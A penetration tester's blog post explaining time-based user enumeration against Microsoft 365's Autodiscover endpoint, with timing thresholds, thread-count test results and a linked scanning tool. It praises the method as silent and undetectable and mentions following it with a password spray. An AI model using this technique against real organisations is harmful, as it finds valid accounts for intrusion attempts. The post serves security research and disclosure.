October 03, 2024

Kicking it Old-School with Time-Based Enumeration in Azure

Written by @ nyxgeek

Cloud Penetration Testing

Table of contents

Introduction
Time-Based User Enumeration – Azure Edition
Basic Auth, WHAT?
Time for Maths for Times
Autodiscover Enumerator
Caveats and Notes
Conclusion

Introduction

Yet another user-enumeration method has been identified in Azure. While Microsoft may have disabled Basic Authentication some time ago, we can still abuse it to identify valid users with a classic technique—time-based user enumeration.

Time-based enumeration is a means of identifying valid users based on the difference in time it takes for the server to return a response to a login attempt. To test for it, you try to log in with a valid username (and an incorrect password) and measure the time it takes to return an ‘Invalid Password’ response. Then you try to log in with an invalid username and measure the response time. If the ‘Invalid Password’ response for an invalid user is a lot faster or slower than the response of a valid user, then you have found time-based user enumeration.

The particular method I’m about to demonstrate has a few advantages:

It is silent and cannot be detected.
It works multi-threaded
It will detect UPNs and aliases

So strap in, and let’s take a look at time-based user enumeration in Azure, and its origins dating back to 2014.

Time-Based User Enumeration – Azure Edition

Time-based user enumeration flaws have existed in various Microsoft products since at least 2014. This was first discovered in Microsoft Exchange by a member of foofus and published in August of 2014.

An attacker makes a login attempt and measures the response time. If it’s a quick response, they’ve just found a valid username. If the response took longer (approximately 5-10x as long), then it was an invalid username. This enumeration was really useful and could be run multi-threaded.

This Exchange enumeration technique has been the starting point for many external pen tests over the years (and internal pen tests too!).

Time-based user enumeration is particularly near and dear to me, and not just because it’s a cyber force-multiplier. The first vulnerability* I ever found was a time-based user enumeration flaw in the on-premises version of Microsoft Lync, aka Skype for Business, back in 2016. (The asterisk is because Microsoft has repeatedly made clear that they do not consider user enumeration to be a vulnerability.)

The Lync time-based user enumeration was simply a variation on the same method described by foofus.net against Exchange. However, with Lync, it was limited to single-threaded use and targeted a Lync POST endpoint instead of the Exchange Autodiscover or OWA servers. Concurrent logins would throw off the timing. Still, single-threaded user enumeration was better than no user enumeration.

It used to be a real bummer when you couldn’t find a source of user enumeration against a target org. Luckily, those days of slim pickings are a thing of the past! In our modern age, Microsoft grants attackers a PLETHORA of ways to enumerate users. And, while there's no shortage of user enumeration methods in Azure/M365, I'm going to demonstrate yet another one -- Time-Based User Enumeration via Basic Auth against Microsoft Autodiscover servers.

Basic Auth, WHAT?

"What?" you say? "Basic Auth is dead!", you say? Well yes, it more or less is dead, but not entirely gone. It lingers on.

Let's take a look at Microsoft's M365 Autodiscover servers. In M365, the Autodiscover endpoint for Commercial Azure (the default that MOST of you are going to be in), is located at:

https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc

If you perform a curl, you can see the HTTP headers indicate Basic Auth.

You used to be able to perform Basic Authentication against this endpoint utilizing a user’s UPN. If you try it now, you'll get a 400 response, and you can see in the HTTP headers that it has blocked Basic Auth.

However, if we time the execution of these requests, we can quickly see that there is a difference in the response times for valid users vs invalid users.

Figure 9 - Valid vs Invalid Response Times

Here you can see that a valid username had a response time of 0.3 seconds while an invalid username had a response time of 2.6 seconds. That is quite a difference.

But did this hold up if we add threading? And how can we reliably determine what the timing threshold is?

I put together a simple scanner in Python to time requests and perform user enumeration. I hardcoded some ballpark figures for testing and set 1.0 seconds as the threshold that divided valid from invalid usernames. This worked most of the time but proved to be a bit high. And I noticed that if I increased the threads, the overall response times increased.

I needed to do more research.

Time for Maths for Times

In order to determine what timing threshold limits should be used, I ran tests with a range of threads from 1 to 100, saving the output from each test into its own file. I then wrote a parser, reclassify.py, that would take the response times from the file and identify the natural gaps in timing between the valid and invalid users.

The method for data clustering I employed is called Jenks natural breaks optimization and is a technique developed for clustering data for mapmaking. Besides identifying the breakpoints between clusters of data, the parser also reclassifies the valid vs invalid lines based on these newly calculated breakpoints and outputs an updated file.

I added a --max-value flag to allow you to zoom in on the data. In the graph above, we can see that the bulk of our data falls around 2.0~ (Ignore the 3.0 spike—those are assigned values for any requests that exceed timeout, and we set a short max timeout value to keep things speedy).

Zoomed in, we can more readily see the gap between the valid (left) and invalid (right) responses. In fact, if you were to zoom in even more, you would find it possible to differentiate between aliases and UPNs. Aliases will generally be slower than UPNs but not as slow as invalid attempts. They'll often blend in with the slower UPNs. However, this is not very reliable, as the timing variances are smaller and any network congestion will sway your results.

Based on these findings, I made some general default ranges based on the number of threads. I purposely left them a little on the high side, as it's always preferable to have a few false positives than it is to miss valid users.

After performing the tests, I then used the reclassify.py tool to identify breakpoints and to see if any improvements could be made by redrawing the valid/invalid thresholds based on this data. For the test, I used a user list of 1,029 usernames, 31 of which were valid UPNs.

Threads	Initial Break Value	Found Valids	False Positive	Reclassify Break Value	Reclassify Found Valids	Reclassify False Positive
1	0.75	31/31	0	0.79	31/31	1
5	0.75	30/31 (97%)	1	0.7	30/31 (97%)	0
15	0.75	30/31 (97%)	2	0.66	29/31 (94%)	1
25	0.75	30/31 (97%)	0	0.80	30/31 (97%)	1
50	0.70	31/31	0	0.73	31/31	1
100	0.65	28/31 (90%)	0	0.79	28/31 (90%)	1

As you can see, the reclassify.py script, while useful for illustrative purposes, does not fare particularly well at drawing new thresholds mathemagically. Time-based enumeration can be a little trickier than other methods due to the unpredictable nature of network traffic. There is always going to be a little bit of slop built into it.

Autodiscover Enumerator

I've wrapped up this enumeration method into a tool called Autodiscover Enumerator. The tool can be found here: https://github.com/nyxgeek/autodiscover_enum/

This is a simple scanner—no database, just text output. By default, the tool will display the response code and times. The -o option can be used to write just the valid usernames to a file.

You want to include a screenshot in a report? I got u. Use -N to suppress that awesome banner and -q to display only the valid usernames.

Figure 14 - Banner Disabled, Quiet Mode Enabled

Caveats and Notes

This method CANNOT be used to identify valid credentials. If you provide a password and look at the response headers, you will see a verbose error indicating that Basic Auth is disabled.

Figure 15 - unable to identify valid creds

This method isn't foolproof. Network congestion can really throw things off. This method seems to be fine up to at least 100 threads. Your mileage may vary.
This enumeration method identifies both UPNs and EMAIL ALIASES (proxyaddress/smtp). I personally would prefer just the UPNs, but we got what we got. If you want to find only the UPNs, you can start with this method, then perform an actual spray against Graph and that will reveal any aliases as invalid usernames.

Figure 16 - Example of Email Alias in M365 Admin Portal

If you send a blank password, the response time increases greatly for both valid and invalid usernames, but the timing difference is still discernible.

Figure 17 - Difference Between Invalid Password and Null Password Attempts

If you examine the verbose error code returned for a blank password being attempted, you see that it identifies it as an EmptyPwd.

It is curious that this seems to indicate that the endpoint is evaluating whether the password is blank before it denies due to Basic Auth. You would think a Basic Auth denial should come first, regardless of whether a password is blank.

If your connection is slow, or you’re not getting hits, examine the average timeouts you're seeing. Test with some known good UPNs shuffled in with a bunch of invalid UPNs, and run the output of that with reclassify.py to find a good breakpoint. Then try setting the default timeout using the -m option, based on the response times you’re seeing.

Figure 19 - Troubleshooting Timing Issues

This timing enumeration touches a couple service areas within Azure. First, it targets an endpoint in their Software as a Service (SaaS) offering of the M365 products (specifically, the Outlook Autodiscover endpoint). And M365 ties in with Entra ID (previously Azure AD), which handles IAM for Azure.

Conclusion

This method of enumeration is silent and versatile. It is able to identify guest accounts, email aliases, and UPNs. The unfortunate downside of it detecting both aliases and UPNs is that it makes this method useless for identifying true user counts and performing statistical surveys. Still, it can be a useful tool for identifying users while remaining undetected.

Happy hunting!

Solutions

Services

About Us